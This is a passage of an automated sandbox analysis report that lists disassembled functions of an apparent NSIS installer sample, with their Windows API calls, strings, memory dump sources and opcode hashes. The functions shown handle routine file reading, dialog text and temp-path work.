                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                              • String ID:
                                                              • API String ID: 2320649405-0
                                                              • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                              • Instruction ID: 069c4eaec478219780f05c004fc5973679282d3c2eb16bc8cec9dcb23997e36d
                                                              • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                              • Instruction Fuzzy Hash: 592151B1500704ABCB20DF68DE08A5B7BF8AF41714B05892EEA96A22E0D739E944CF54
                                                              Function 004026F1 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1
                                                                • Part of subcall function 00406128: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040613E
                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                              • String ID: 9
                                                              • API String ID: 163830602-2366072709
                                                              • Opcode ID: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
                                                              • Instruction ID: e892b7cb172a86a35cdf2d5061c859a119b49b65f2ae0b0c69c9b35c58dd84de
                                                              • Opcode Fuzzy Hash: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
                                                              • Instruction Fuzzy Hash: F151FB75D0411AABDF24DFD4CA85AAEBBB9FF04344F10817BE901B62D0D7B49D828B58
                                                              Function 00406805 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharNextW.USER32(?,*?|<>/":,00000000,0043F000,75573420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
                                                              • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
                                                              • CharNextW.USER32(?,0043F000,75573420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
                                                              • CharPrevW.USER32(?,?,75573420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Char$Next$Prev
                                                              • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                              • API String ID: 589700163-2246974252
                                                              • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                              • Instruction ID: fa9c0ef9ae643832d728fa0671e6943ea0b093c18f887e6db6f7fe1f852dcfd9
                                                              • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                              • Instruction Fuzzy Hash: F111932780221299DB303B148C40E7766E8AF54794F52C43FED8A722C0F77C4C9286AD
                                                              Function 6FF61987 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,6FF610E0), ref: 6FF61990
                                                              • GetModuleHandleA.KERNEL32(KERNEL32,?,?,00000000,?,?,?,6FF610E0), ref: 6FF6199E
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 6FF619BD
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 6FF619E6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1450170496.000000006FF61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FF60000, based on PE: true
                                                              • Associated: 00000000.00000002.1450157086.000000006FF60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.1450186265.000000006FF62000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.1450199247.000000006FF63000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.1450217071.000000006FF64000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff60000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$CurrentHandleModuleProcess
                                                              • String ID: IsWow64Process2$KERNEL32
                                                              • API String ID: 977827838-1019154776
                                                              • Opcode ID: 55ea944f631694e8ea88137a4be0121e0caadd98b18876f9735b4e61095aaf42
                                                              • Instruction ID: 4e365d8a0a6bdf5798ff94db1e6b80fbc6c7e21a570401b99834a00ac72d7de7
                                                              • Opcode Fuzzy Hash: 55ea944f631694e8ea88137a4be0121e0caadd98b18876f9735b4e61095aaf42
                                                              • Instruction Fuzzy Hash: 0B015E76D00609BADF01DFF48C45EEFBBBC9F05654F008162A911E2281EFB5EA05CBA0
                                                              Function 00404E91 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404EAC
                                                              • GetMessagePos.USER32 ref: 00404EB4
                                                              • ScreenToClient.USER32(?,?), ref: 00404ECE
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EE0
                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F06
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Message$Send$ClientScreen
                                                              • String ID: f
                                                              • API String ID: 41195575-1993550816
                                                              • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                              • Instruction ID: eb967d7d92909976ed67768bbc6bf91133f1097352fa1b537f2083fc5134d3bd
                                                              • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                              • Instruction Fuzzy Hash: AB019E71900219BADB00DB94DD81FFEBBBCAF95710F10412BFB11B61C0C7B4AA018BA4
                                                              Function 00402F98 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
                                                              • MulDiv.KERNEL32(0002F000,00000064,000B7218), ref: 00402FE1
                                                              • wsprintfW.USER32 ref: 00402FF1
                                                              • SetWindowTextW.USER32(?,?), ref: 00403001
                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013
                                                              Strings
                                                              • verifying installer: %d%%, xrefs: 00402FEB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                              • String ID: verifying installer: %d%%
                                                              • API String ID: 1451636040-82062127
                                                              • Opcode ID: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                                              • Instruction ID: b4a4546c530c1255e03538258eeb387f0310dfe45b0532776fb26864182fd6cc
                                                              • Opcode Fuzzy Hash: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                                              • Instruction Fuzzy Hash: 8D014F71640208BBEF209F60DE49FEE3B79AB04344F108039FA02B91D0DBB99A559B59
                                                              Function 00402955 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                                                              • GlobalFree.KERNEL32(?), ref: 00402A0B
                                                              • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                              • String ID:
                                                              • API String ID: 2667972263-0
                                                              • Opcode ID: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
                                                              • Instruction ID: 9240dae09012554c896714223f9a1d047de53ad28ef79bac3653223f28d0231c
                                                              • Opcode Fuzzy Hash: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
                                                              • Instruction Fuzzy Hash: 3931AD71D00124BBCF21AFA5CE89D9E7E79AF49324F10423AF521762E1CB794D419BA8
                                                              Function 00405F2E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 47stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                                                • Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,C:\Users\user\AppData\Local\Temp\nsbB152.tmp, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,75573420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405EDF
                                                                • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
                                                                • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC
                                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsbB152.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,C:\Users\user\AppData\Local\Temp\nsbB152.tmp, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,75573420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405F87
                                                              • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsbB152.tmp,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,C:\Users\user\AppData\Local\Temp\nsbB152.tmp, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,75573420,C:\Users\user\AppData\Local\Temp\), ref: 00405F97
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                              • String ID: 4Wu$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsbB152.tmp
                                                              • API String ID: 3248276644-2857754586
                                                              • Opcode ID: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
                                                              • Instruction ID: 0bce86d1d95a7c790b53086ee47358a3377499fb664fcb231eb74dc800c81f90
                                                              • Opcode Fuzzy Hash: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
                                                              • Instruction Fuzzy Hash: 7AF0F43A105E1269D622733A5C09AAF1555CE86360B5A457BFC91B22C6CF3C8A42CCBE
                                                              Function 00401D86 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,?), ref: 00401D9F
                                                              • GetClientRect.USER32(?,?), ref: 00401DEA
                                                              • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                                                              • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                                                              • DeleteObject.GDI32(00000000), ref: 00401E3E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                              • String ID:
                                                              • API String ID: 1849352358-0
                                                              • Opcode ID: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
                                                              • Instruction ID: ff9804e90d7d2423da96771145ec8c84d1acc30631874d8c14b803c0354ed8c3
                                                              • Opcode Fuzzy Hash: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
                                                              • Instruction Fuzzy Hash: 73210772900119AFCB05DF98EE45AEEBBB5EF08314F14003AF945F62A0D7789D81DB98
                                                              Function 00401E53 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDC.USER32(?), ref: 00401E56
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                                                              • ReleaseDC.USER32(?,00000000), ref: 00401E89
                                                              • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                              • String ID:
                                                              • API String ID: 3808545654-0
                                                              • Opcode ID: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
                                                              • Instruction ID: a825ad976d3f878f3d1ae6f085165680ecf176d60430839047bda31eedf7821d
                                                              • Opcode Fuzzy Hash: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
                                                              • Instruction Fuzzy Hash: 62017571905240EFE7005BB4EE49BDD3FA4AB15301F10867AF541B61E2C7B904458BED
                                                              Function 00404D83 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
                                                              • wsprintfW.USER32 ref: 00404E2D
                                                              • SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ItemTextlstrlenwsprintf
                                                              • String ID: %u.%u%s%s
                                                              • API String ID: 3540041739-3551169577
                                                              • Opcode ID: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                                              • Instruction ID: 0fe25742dfe6cfa92c38baccc724587d3b65f537d6828788df476db8ac6fa50e
                                                              • Opcode Fuzzy Hash: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                                              • Instruction Fuzzy Hash: B111EB336042283BDB109A6DAC45E9E329CDF85374F250237FA65F71D1E978DC2282E8
                                                              Function 00405ED1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,C:\Users\user\AppData\Local\Temp\nsbB152.tmp, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,75573420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405EDF
                                                              • CharNextW.USER32(00000000), ref: 00405EE4
                                                              • CharNextW.USER32(00000000), ref: 00405EFC
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\nsbB152.tmp, xrefs: 00405ED2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CharNext
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsbB152.tmp
                                                              • API String ID: 3213498283-627501760
                                                              • Opcode ID: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                              • Instruction ID: 143c5bdbadb979d876a68ad22b5e9fde56015454fa81a7c55dbcd1e73dec783f
                                                              • Opcode Fuzzy Hash: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                              • Instruction Fuzzy Hash: 03F09072D04A2395DB317B649C45B7756BCEB587A0B54843BE601F72C0DBBC48818ADA
                                                              Function 00405E26 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E2C
